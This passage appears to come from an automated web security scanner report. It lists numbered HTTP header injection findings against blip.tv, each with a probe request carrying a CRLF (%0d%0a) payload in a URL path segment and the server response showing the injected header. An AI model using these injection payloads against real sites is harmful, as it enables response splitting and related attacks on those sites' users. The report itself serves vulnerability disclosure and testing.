GET /d9557%0d%0a1ccc7956757 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/d9557
1ccc7956757

Content-Type: text/html; charset=iso-8859-1
Content-Length: 293
Date: Thu, 20 Jan 2011 00:38:50 GMT
X-Varnish: 344230656
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/d9557
1ccc7956757">here</a>
...[SNIP]...

2.172. http://blip.tv/play/AYG43E4C [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYG43E4C

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5e893%0d%0afef1a092f91 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5e893%0d%0afef1a092f91/AYG43E4C HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/5e893
fef1a092f91
/AYG43E4C
Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:45 GMT
X-Varnish: 1025269683
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/5e893
fef1a092f91/AYG43E4C"
...[SNIP]...

2.173. http://blip.tv/play/AYG43E4C [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYG43E4C

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 8ae4b%0d%0aef261fee625 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/8ae4b%0d%0aef261fee625 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/8ae4b
ef261fee625

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:45 GMT
X-Varnish: 2146048296
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/8ae4b
ef261fee625">her
...[SNIP]...

2.174. http://blip.tv/play/AYG43E4C/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYG43E4C/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9d9ed%0d%0a1d0190b6bfe was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9d9ed%0d%0a1d0190b6bfe/AYG43E4C/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/9d9ed
1d0190b6bfe
/AYG43E4C/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 288
Date: Thu, 20 Jan 2011 00:38:45 GMT
X-Varnish: 1498219656
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/9d9ed
1d0190b6bfe/AYG43E4C/
...[SNIP]...

2.175. http://blip.tv/play/AYG43E4C/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYG43E4C/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 9b62f%0d%0aafb7f205a9b was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/9b62f%0d%0aafb7f205a9b/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/9b62f
afb7f205a9b
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 284
Date: Thu, 20 Jan 2011 00:38:46 GMT
X-Varnish: 1498219708
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/9b62f
afb7f205a9b/">he
...[SNIP]...

2.176. http://blip.tv/play/AYKO2zcC [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKO2zcC

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload bef89%0d%0a78a00608a45 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /bef89%0d%0a78a00608a45/AYKO2zcC HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/bef89
78a00608a45
/AYKO2zcC
Content-Type: text/html; charset=iso-8859-1
Content-Length: 302
Date: Thu, 20 Jan 2011 00:38:48 GMT
X-Varnish: 1324530645
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/bef89
78a00608a45/AYKO2zcC"
...[SNIP]...

2.177. http://blip.tv/play/AYKO2zcC [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKO2zcC

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload faa16%0d%0ad4d07c4ea2a was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/faa16%0d%0ad4d07c4ea2a HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/faa16
d4d07c4ea2a

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:48 GMT
X-Varnish: 344230345
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/faa16
d4d07c4ea2a">her
...[SNIP]...

2.178. http://blip.tv/play/AYKO2zcC/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKO2zcC/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload ab7a4%0d%0a628a1e29106 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /ab7a4%0d%0a628a1e29106/AYKO2zcC/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/ab7a4
628a1e29106
/AYKO2zcC/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 288
Date: Thu, 20 Jan 2011 00:38:48 GMT
X-Varnish: 1324530741
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/ab7a4
628a1e29106/AYKO2zcC/
...[SNIP]...

2.179. http://blip.tv/play/AYKO2zcC/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKO2zcC/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload e6eea%0d%0a0a912b6859e was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/e6eea%0d%0a0a912b6859e/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/e6eea
0a912b6859e
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 284
Date: Thu, 20 Jan 2011 00:38:49 GMT
X-Varnish: 1248908777
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/e6eea
0a912b6859e/">he
...[SNIP]...

2.180. http://blip.tv/play/AYKY+jQC [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKY+jQC

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload b6315%0d%0a813561f09f7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /b6315%0d%0a813561f09f7/AYKY+jQC HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/b6315
813561f09f7
/AYKY+jQC
Content-Type: text/html; charset=iso-8859-1
Content-Length: 302
Date: Thu, 20 Jan 2011 00:38:43 GMT
X-Varnish: 1248907746
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/b6315
813561f09f7/AYKY+jQC"
...[SNIP]...

2.181. http://blip.tv/play/AYKY+jQC [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKY+jQC

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload bc569%0d%0ad3d84c47ba8 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/bc569%0d%0ad3d84c47ba8 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/bc569
d3d84c47ba8

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:44 GMT
X-Varnish: 1025269553
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/bc569
d3d84c47ba8">her
...[SNIP]...

2.182. http://blip.tv/play/AYKY+jQC/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKY+jQC/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 23c99%0d%0a090959020ae was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /23c99%0d%0a090959020ae/AYKY+jQC/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/23c99
090959020ae
/AYKY+jQC/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 303
Date: Thu, 20 Jan 2011 00:38:43 GMT
X-Varnish: 1324529866
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/23c99
090959020ae/AYKY+jQC/
...[SNIP]...

2.183. http://blip.tv/play/AYKY+jQC/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKY+jQC/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 2ca83%0d%0a128c7cc92be was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/2ca83%0d%0a128c7cc92be/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/2ca83
128c7cc92be
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 284
Date: Thu, 20 Jan 2011 00:38:44 GMT
X-Varnish: 344229583
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/2ca83
128c7cc92be/">he
...[SNIP]...

2.184. http://blip.tv/play/AYKY31UC [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKY31UC

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload eb535%0d%0a9e9b4f6a7b4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /eb535%0d%0a9e9b4f6a7b4/AYKY31UC HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/eb535
9e9b4f6a7b4
/AYKY31UC
Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:45 GMT
X-Varnish: 2146048179
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/eb535
9e9b4f6a7b4/AYKY31UC"
...[SNIP]...

2.185. http://blip.tv/play/AYKY31UC [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKY31UC

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload d91e6%0d%0ae9cbf33725c was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/d91e6%0d%0ae9cbf33725c HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/d91e6
e9cbf33725c

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:45 GMT
X-Varnish: 1324530160
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/d91e6
e9cbf33725c">her
...[SNIP]...

2.186. http://blip.tv/play/AYKY31UC/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKY31UC/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4f9cc%0d%0a40527a2d90f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4f9cc%0d%0a40527a2d90f/AYKY31UC/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/4f9cc
40527a2d90f
/AYKY31UC/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 288
Date: Thu, 20 Jan 2011 00:38:48 GMT
X-Varnish: 1248908684
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/4f9cc
40527a2d90f/AYKY31UC/
...[SNIP]...

2.187. http://blip.tv/play/AYKY31UC/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKY31UC/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 2679a%0d%0af81e182e5a5 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/2679a%0d%0af81e182e5a5/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/2679a
f81e182e5a5
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 284
Date: Thu, 20 Jan 2011 00:38:49 GMT
X-Varnish: 2146048843
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/2679a
f81e182e5a5/">he
...[SNIP]...

2.188. http://blip.tv/play/AYKZp2EC [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKZp2EC

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 52d50%0d%0a0aea56bf3eb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /52d50%0d%0a0aea56bf3eb/AYKZp2EC HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/52d50
0aea56bf3eb
/AYKZp2EC
Content-Type: text/html; charset=iso-8859-1
Content-Length: 302
Date: Thu, 20 Jan 2011 00:38:42 GMT
X-Varnish: 1248907589
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/52d50
0aea56bf3eb/AYKZp2EC"
...[SNIP]...

2.189. http://blip.tv/play/AYKZp2EC [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKZp2EC

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 25f47%0d%0ae8af83f81dc was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/25f47%0d%0ae8af83f81dc HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/25f47
e8af83f81dc

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:43 GMT
X-Varnish: 1248907651
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/25f47
e8af83f81dc">her
...[SNIP]...

2.190. http://blip.tv/play/AYKZp2EC/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKZp2EC/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7b76c%0d%0a77c94b9702c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7b76c%0d%0a77c94b9702c/AYKZp2EC/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/7b76c
77c94b9702c
/AYKZp2EC/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 288
Date: Thu, 20 Jan 2011 00:38:43 GMT
X-Varnish: 1025269306
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/7b76c
77c94b9702c/AYKZp2EC/
...[SNIP]...

2.191. http://blip.tv/play/AYKZp2EC/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKZp2EC/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload d2638%0d%0a6ef855d3c8b was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/d2638%0d%0a6ef855d3c8b/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/d2638
6ef855d3c8b
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 284
Date: Thu, 20 Jan 2011 00:38:43 GMT
X-Varnish: 2146047947
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/d2638
6ef855d3c8b/">he
...[SNIP]...

2.192. http://blip.tv/play/AYKc0AIC [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKc0AIC

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8d0e4%0d%0a0170a13e0d6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8d0e4%0d%0a0170a13e0d6/AYKc0AIC HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/8d0e4
0170a13e0d6
/AYKc0AIC
Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:40 GMT
X-Varnish: 1498218747
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
